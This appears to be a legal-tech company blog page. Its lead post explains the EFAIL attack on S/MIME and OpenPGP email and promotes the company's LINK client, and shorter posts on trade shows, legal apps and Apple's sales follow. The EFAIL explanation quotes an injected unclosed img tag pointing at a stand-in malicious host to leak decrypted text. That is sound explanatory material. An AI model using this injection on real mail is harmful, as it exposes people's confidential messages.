By Seth Hallem, Moble Helix CEO, Co-founder, & Chief Architect
Secure email using S/MIME and OpenPGP is fundamentally broken. Our CEO explains the EFAIL vulnerability and why our LINK Email is not susceptible to EFAIL. What do we do next to protect email?
On Sunday night, a team of researchers from Germany and Belgium dropped a major bomb on the world of encrypted email by describing a simple, widely applicable, and wildly effective technique for coercing email clients to release encrypted email contents through “Exfiltration channels.” The concept is simple – by using a combination of known manipulation techniques against the encryption algorithms specified in the S/MIME and OpenPGP standards and lax security choices in a wide variety of email clients, the research team was able to intercept and manipulate encrypted emails such that large blocks of the encrypted text are revealed to a malicious server.
What is most brilliant (and most dangerous) about this attack, is that the attack does not require decrypting the email messages or stealing encryption keys. Hence, the attack can be deployed as a man-in-the-middle attack on the infrastructure of the internet itself, rather than requiring that a specific email server or email client is compromised.
The essential idea behind this attack is simple – HTML emails expose a variety of reasons to query remote servers to load parts of those emails. The simplest (and most common) example of this concept is displaying embedded images. Many marketing emails use tiny embedded images to monitor who has opened an email. This technique is so pervasive that many of us have become desensitized to clicking the “Allow images from this sender” prompt in Outlook. It is common practice for marketing emails to contain embedded images with essential content, which encourages users to allow the client to load all images in that message. However, doing so loads both visible images and tiny, single pixel images that marketing tools use to uniquely determine that we have opened the email message in question.
The research team used this concept of HTML exfiltration channels (e.g., loading images from a remote server) to essentially place the encrypted contents of an email inside of an unclosed “img” tag. In other words, by manipulating a block at the start of an email in order to modify its contents to an injected HTML tag of the form <img src=”http://mailicious.my/, the researchers could then ensure that the encrypted blocks containing the secret message were decrypted into the URL path of the unclosed img tag. On the malicious server (e.g., mailicious.my), the URL path is trivially read and, hence, the encrypted data in the email is stolen.
While the basic concept is simple, the details and the level of vulnerability differ by protocol (S/MIME vs. OpenPGP) and email client. OpenPGP has more potential to be free of vulnerability, but that requires a certain set of choices in the implementation of the decryption algorithm in OpenPGP that many email clients have not chosen. In addition, the more click-happy a user is in allowing embedded images to load, the more likely the exploit is to succeed in any arbitrary email client.
What is most alarming about this attack is that there is no simple bug to be fixed, and the presence (or absence) of corporate email security gateways has absolutely no bearing on whether or not the attack will succeed. In summary, secure email using S/MIME and OpenPGP is fundamentally broken. Chances are, it may be fatally broken because upgrading these protocols across the many email clients and security gateways that implement them is an essentially intractable problem.
Our product, LINK, has no particular stake in this game – we do not support S/MIME or OpenPGP on the email client as those protocols are generally implemented at the gateway level in a corporate context. However, LINK does provide one distinct advantage over most email clients – we do strict HTML validation of all emails before downloading them using the OWASP Java HTML sanitizer. Hence, emails with unclosed img tags (leading to the open-ended manipulation of secret data into a URL path) fail sanitization, and the result sent to our email client is an empty message. While it would take a far more extensive investigation to ensure that the LINK email client definitively blocks all possible “exfiltration channels,” the simple examples presented in the paper will not work with LINK email.
Email was never designed with security in mind. Were it designed to be secure, encryption standards like S/MIME and OpenPGP would have been designed into the SMTP protocol itself, rather than layered on top and left to individual clients and gateway solutions to implement with varying degrees of care. However, LINK Email was designed with security in mind and, hence, we are more careful than most about what content we choose to display in the LINK client. However, we have not yet endeavored to solve the problem of end-to-end data protection and integrity for email messages. At the moment, our customers rely on the same gateway solutions that have just proven vulnerable.
When it comes to sending confidential email, S/MIME and OpenPGP, including all of the various gateway solutions that automatically encrypt using those protocols, are no longer safe choices. It is time for enterprises to look to an IRM-based solution, such as Microsoft Azure Rights Management, to protect email using modern encryption that is not vulnerable to the message manipulation technique employed in this exploit. In the long run, the user experience of email is here to stay, but the underlying technology needs to evolve. Security needs to be designed into email transport. Until that happens, email will remain a ripe target for hackers and thieves.
ILTACON offers a unique opportunity for members to learn from Legal IT peers and to see the latest in legal technology. We will be demonstrating our LINK mobile app for lawyers.
Stop by booth 820 to see how easy it is to:
- View an NRL, with redlines and comments, in LINK Email
- Send and file-to DMS
- Check a doc into DMS
- Search DMS and email a doc
And LINK’s two new features: Continue reading
By Seth Hallem, Mobile Helix CEO and co-founder
On March 28th, the Department of Justice confirmed that it had successfully unlocked the San Bernardino shooter’s iPhone 5C without Apple’s assistance. On that same day, the US government moved to vacate a California court order that had attempted to force Apple to assist in the decryption of the device. While the legal maneuverings are fascinating in their own right, the conclusion leads to an even more fascinating technology discussion – how did the FBI crack the iPhone, and what are the implications of this successful hack? Continue reading
The 10th Annual 2015 ILTA / InsideLegal Technology Purchasing Survey was released at ILTACON last week. It’s a quick read and I recommend taking a look at the entire report.
As an introduction to the tech survey, I’ve highlighted the five points that I found most interesting and indicative of our times.
It flew by like lightning and now the carpet has literally been rolled up on the ABA TECHSHOW 2015. As always, the best part was the chance to network with lawyers who are not only tech savvy but tech enthusiasts and very generous with their knowledge. I attended the “60 iOS Apps in 60 Minutes Session”, which was deeply informative and lots of fun. A few of the top recommendations were:
TranscriptPad – Review and annotate transcripts. Per Jeff Richardson, @iPhoneJD, “at $90 worth twice the price.”
Overcast – Legal podcasts are a popular way to keep up with the latest in legal technology. Overcast is free for the basic version, but the $5 version is particularly productive. It removes the spaces between words and accelerates speed. Adriana Linares, @AdrianaL, especially likes that with Overcast you can send a colleague a link to a specific episode of a podcast.
Scannable by Evernote – An easy way to scan docs and business cards. Email docs or save to several apps including Evernote. Free. Recommended by Tom Mighell, @TomMighell.
Automatic App – This app provides data from your car, including mileage driven and service reminders. Joe Bahgat, @j0eybagodonuts, recommends it as it makes tracking business usage of your car a breeze. $99.95 for the adapter which plugs into your car’s diagnostic port.
There were 56 more apps, including Headspace, for mindfulness/meditation, and the Sonos speaker controller. Jeff Richardson will post them all this week on his blog, iPhoneJD.
Mobile Helix made two major announcements. We released the new version of our mobile app for lawyers, LINK 2.0. LINK 2.0 integrates with WorkSite/FileSite and NetDocuments so that lawyers can securely access their docs and email them to clients and colleagues from smartphones and tablets. With LINK, when you send a colleague a doc which is stored in WorkSite she will receive a viewable .nrl attachment.
Two terrific new features, doc editing and file to WorkSite/FileSite will be released later this quarter.
NetDocuments announced their new Apps Marketplace at ABA TECHSHOW. We are thrilled to be one of their partners. Using their APIs we integrated LINK with NetDocuments so that NetDocuments users can access their docs, Outlook, SharePoint, and other apps from one secure app, LINK, without having to sign-on to each app. LINK’s efficient integration makes it easy to draft an Outlook email, attach a doc stored in NetDocuments, and send it to a client from your smartphone or tablet.
You can test drive LINK for free. Download LINK from the App Store here and follow the directions to “Take a Test Drive.” Try composing an email and attaching a file from SharePoint. If you have a NetDocuments account you can login into NetDocuments from the LINK app and access your own docs in LINK.
Take LINK for a drive. We would love to know what you think!
maureen at mobilehelix dot com
As the story goes, the young Isaac Newton was sitting in his garden when an apple fell onto his head and, in a stroke of brilliant insight, he suddenly invented the theory of gravity.1 The story is almost certainly embellished, though it has found its place in popular culture, and has been taught to generations of young receptive science students ever since.
Winding the clock forward to 2015 brings us to a whole new and different kind of Apple (NASDAQ:AAPL). On January 29th Apple became the most profitable company in history. This is an incredible achievement. Examining how Apple has achieved this milestone is even more amazing.
Apple’s sales and profitability are driven by sales of the iPhone (currently 69% of revenues), and more specifically by the new iPhone 6 and 6 Plus. During the last quarter, Apple sold a staggering 74.5 million iPhones. This equates to 830,000 devices per day or 35,000 per hour for 24 hours per day, 7 days per week. This represents a 46% increase in iPhone sales year-on-year, while simultaneously increasing the iPhone average selling price by $50 to $687 per unit. For reference, average smartphone prices have declined from $440 in 2010 to an estimated $275 in 2015. Apple defies gravity… again, indeed.
To quote from Motley Fool2 “That Apple can deliver both massive sales volume and rising prices in the context of rapidly declining industry prices speaks wonders about Apple’s competitive differentiation and the booming popularity of its new iPhone 6 and 6 Plus models”. Many congratulations to Tim Cook and the whole Apple team on this achievement.
As companies get bigger, continued rapid growth gets much, much harder. It is therefore tempting to assume that Apple’s incredible performance cannot be sustained. The Economist sums the problem up well in “Apple Reigns Supreme”.3
However, Apple’s recent history suggests otherwise. Apple will launch its much awaited (and much hyped) Apple Watch in April. Will this new device completely redefine the watch and show us all the critical things that we have been missing until now, or, will it fade as a niche luxury product that only appeals to the wealthy and tech obsessed?
No one knows for sure. We will have to wait and see. However, I suspect that we will be reading similar glowing coverage later this year as Apple Defies Gravity… Again.